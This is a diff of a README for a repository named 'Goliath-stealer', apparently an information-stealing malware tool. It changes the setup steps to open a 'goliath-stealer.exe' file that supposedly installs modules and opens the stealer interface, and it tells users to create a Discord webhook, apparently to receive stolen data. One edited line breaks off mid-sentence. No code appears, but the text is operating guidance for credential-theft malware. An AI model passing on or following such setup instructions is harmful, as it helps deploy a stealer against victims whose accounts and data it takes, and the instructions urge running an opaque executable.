wwcomsswww/Goliath-stealer/README.md

 Once you've downloaded the files extract the folder so it's no longer a .zip file.

-3. Open The goliath-stealer-setup.py File:
+3. Open The goliath-stealer.exe File:

 You dont need to manually install any modules.
-Just opening goliath-stealer-setup.py will install them for you.
-If successfull the goliath-stealer-setup.py will then open up the stealer gui.
+Just opening goliath-stealer.exe will install them for you.
+If successfull the goliath-stealer.exe
 4. Create A Webhook:

 If you don't know how to make a webhook you can follow this guide: https://support.discord.com/hc/en-us/articles/228383668-Intro-to-Webhooks